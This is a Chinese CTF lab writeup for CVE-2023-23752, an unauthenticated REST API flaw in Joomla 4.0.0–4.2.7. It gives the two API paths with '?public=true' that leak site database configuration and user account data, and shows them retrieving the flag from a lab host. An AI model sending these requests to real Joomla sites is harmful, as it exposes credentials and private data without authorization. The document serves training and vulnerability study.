当前位置: 首页 > article >正文

[春秋云镜] CVE-2023-23752 writeup

首先奉上大佬的wp表示尊敬:(很详细)[ 漏洞复现篇 ] Joomla未授权访问Rest API漏洞(CVE-2023-23752)_joomla未授权访问漏洞(cve-2023-23752)-CSDN博客

知识点

  • Joomla版本为4.0.0 到 4.2.7 存在未授权访问漏洞
    • Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行
  • 未授权api路径
    • 获取网站的配置文件信息
      • /api/index.php/v1/config/application?public=true
    • 获取账号密码信息
      • api/index.php/v1/users?public=true
    • 其他api接口
      • 详见开头大佬的wp结尾

  • REST API

    • 规定固定格式的应用程序接口:将用户操作转为http请求的api

    • 详见:一文彻底弄懂REST API - 知乎

解题思路

题目地址:Home

点击连接进入到网页初始页面

可以看到旁边有很多的链接:登录界面,找回密码界面,找回用户名界面

通过测试发现这些界面无法进入,到这里已废,只能求助大佬的wp

发现了未授权的接口链接:

获取网站的配置文件信息:
/api/index.php/v1/config/application?public=true

将该路径添加到网站后面发现成功得到了配置文件的信息:数据库的相关配置信息

http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/config/application?public=true

获取网站的账号密码信息:
api/index.php/v1/users?public=true

通过构造访问得到了flag:flag{c68a8080-245b-4892-9053-21dbb6ad0fa0}

http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/users?public=true

10

http://www.lryc.cn/news/2394785.html

相关文章:

  • Java集合操作常见错误与最佳实践
  • CSS专题之水平垂直居中
  • python打卡day41@浙大疏锦行
  • vue3 基本语法 父子关系
  • 算法-js-子集
  • (新)MQ高级-MQ的可靠性
  • Android设置界面层级为最上层实现
  • 云原生微服务架构演进之路:理念、挑战与实践
  • Go语言使用阿里云模版短信服务
  • Leetcode 3231. 要删除的递增子序列的最小数量
  • 4.2.5 Spark SQL 分区自动推断
  • 基于昇腾MindSpeed训练加速库玩转智谱GLM-4-0414模型
  • 【图像处理入门】2. Python中OpenCV与Matplotlib的图像操作指南
  • Spring Boot微服务架构(九):设计哲学是什么?
  • GRCh38版本染色体位置转换GRCh37(hg19)
  • TC/BC/OC P2P/E2E有啥区别?-PTP协议基础概念介绍
  • 解决微信小程序中 Flex 布局下 margin-right 不生效的问题
  • Kafka数据怎么保障不丢失
  • 使用HTTPS进行传输加密
  • AI书签管理工具开发全记录(八):Ai创建书签功能实现
  • X-plore v4.43.05 强大的安卓文件管理器-MOD解锁高级版 手机平板/电视TV通用
  • 使用多Agent进行海报生成的技术方案及评估套件-P2P、paper2poster
  • Redis--缓存工具封装
  • python:在 PyMOL 中如何查看和使用内置示例文件?
  • SpringCloud——Docker
  • 机器学习:欠拟合、过拟合、正则化
  • 运用集合知识做斗地主案例
  • 《HelloGitHub》第 110 期
  • 使用 Shell 脚本实现 Spring Boot 项目自动化部署到 Docker(Ubuntu 服务器)
  • day023-网络基础与OSI七层模型